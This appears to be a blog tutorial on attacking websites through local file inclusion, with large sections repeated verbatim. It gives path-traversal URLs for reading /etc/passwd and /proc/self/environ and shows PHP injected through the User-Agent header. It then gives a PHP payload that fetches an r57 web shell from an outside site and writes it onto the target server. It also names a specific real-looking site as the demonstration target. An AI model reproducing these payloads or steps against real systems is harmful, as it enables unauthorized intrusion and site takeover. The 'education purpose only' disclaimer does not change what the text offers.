Hii.... Today we are going to see LFI attack using tamper data add-on on firefox..
First of all we need a website vulnerable to LFI...
there are plenty of software which can help you to find LFI vulnerable website..
If you don't have any software then you can download it from here.
How to check LFI vulnerability on a website:-
if our target is something like this.. then
http://www.url.com/view.php?page=about.php
then replace about.php with ../
so now url will become http://www.url.com/view.php?page=../
check the source code (Press ctrl+u ) and check if you got any error like
Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/.....
First of all we need a website vulnerable to LFI...
there are plenty of software which can help you to find LFI vulnerable website..
If you don't have any software then you can download it from here.
How to check LFI vulnerability on a website:-
if our target is something like this.. then
http://www.url.com/view.php?page=about.php
then replace about.php with ../
so now url will become http://www.url.com/view.php?page=../
check the source code (Press ctrl+u ) and check if you got any error like
Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/.....
their is high chances that website is LFI vulnerable.
now check if you can access /etc/passwd for that just add /etc/passwd in the end of url, now url will be like http://www.url.com/view.php?page=../etc/passwd
if you get an error failed to open /etc/passwd no such file or directory. then add ../ before /etc/passwd
and keep on adding till you get access on /etc/passwd
you will get an output like
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin
once you get access to /etc/passwd now try to access /proc/self/environ for that replace /etc/passwd
if your url is http://www.url.com/view.php?page=../../../../../etc/passwd then it will become like this
http://www.url.com/view.php?page=../../../../../proc/self/environ
and check if their is any remote address and etc...
if you got any output for this file that means we can attack on this website using this method..
For this tutorial I will use,
http://www.pscet.in/index.php?page=../../../../../../../../../../etc/passwd
http://www.pscet.in/index.php?page=../../../../../../../../../../etc/passwd
now check for /proc/self/environ
now we are going to use Firefox and Tamper data for attack.
download and install tamper data add-on in firefox.
Start tamper data
press alt+t --> tamper data
click on start tamper
reload the page..
after that tamper data will ask you for tamper the data click, on tamper
now go to user-agent field and in the end add <?phpinfo()?> click ok
now check if you get any reply from server.....
you should get all the information about the php version and other detail about php running on that server..
now is time to upload our shell on that website....
I suggest you to visit http://www.c99shell.gen.tr this website contain all type of shell you need to hack any website use c99 or r57 (their is txt version of all the shell first open the txt file which contain php code, if it doesn't open then you should other shell) for this tutorial I will use r57 shell....
Process is same go to tamper data --> start tamper --> reload page --> go to user-agent field
generally we use system() or exec() method to upload out shell but in most of the cases both of functions are blocked (even on this target both are blocked) to check if they are blocked or not add php script <?system('uname -a');?> and check the reply if you didn't get any reply on your page then check for source code and check their if function is blocked you will get message "system() is blocked for security reason".
So, we will use another method which is generally not blocked on any website
use the php string in user-agent field.
<?php $file = fopen("r57.php","w+"); $stream = fopen ("http://www.c99shell.gen.tr/r57.txt", "r"); while(!feof($stream)) { $shell .=fgets($stream); } fwrite($file, $shell); fclose($file);?>
you can change link and name of shell.....
this is it your shell have been uploaded......
to start shell go to http://url/nameofshell.php
This tutorial is for education purpose only... don't use this information for any wrong purpose....
I have uploaded an video based on this tutorial....
you should get all the information about the php version and other detail about php running on that server..
now is time to upload our shell on that website....
I suggest you to visit http://www.c99shell.gen.tr this website contain all type of shell you need to hack any website use c99 or r57 (their is txt version of all the shell first open the txt file which contain php code, if it doesn't open then you should other shell) for this tutorial I will use r57 shell....
Process is same go to tamper data --> start tamper --> reload page --> go to user-agent field
generally we use system() or exec() method to upload out shell but in most of the cases both of functions are blocked (even on this target both are blocked) to check if they are blocked or not add php script <?system('uname -a');?> and check the reply if you didn't get any reply on your page then check for source code and check their if function is blocked you will get message "system() is blocked for security reason".
So, we will use another method which is generally not blocked on any website
use the php string in user-agent field.
<?php $file = fopen("r57.php","w+"); $stream = fopen ("http://www.c99shell.gen.tr/r57.txt", "r"); while(!feof($stream)) { $shell .=fgets($stream); } fwrite($file, $shell); fclose($file);?>
you can change link and name of shell.....
this is it your shell have been uploaded......
to start shell go to http://url/nameofshell.php
This tutorial is for education purpose only... don't use this information for any wrong purpose....
I have uploaded an video based on this tutorial....
No comments:
Post a Comment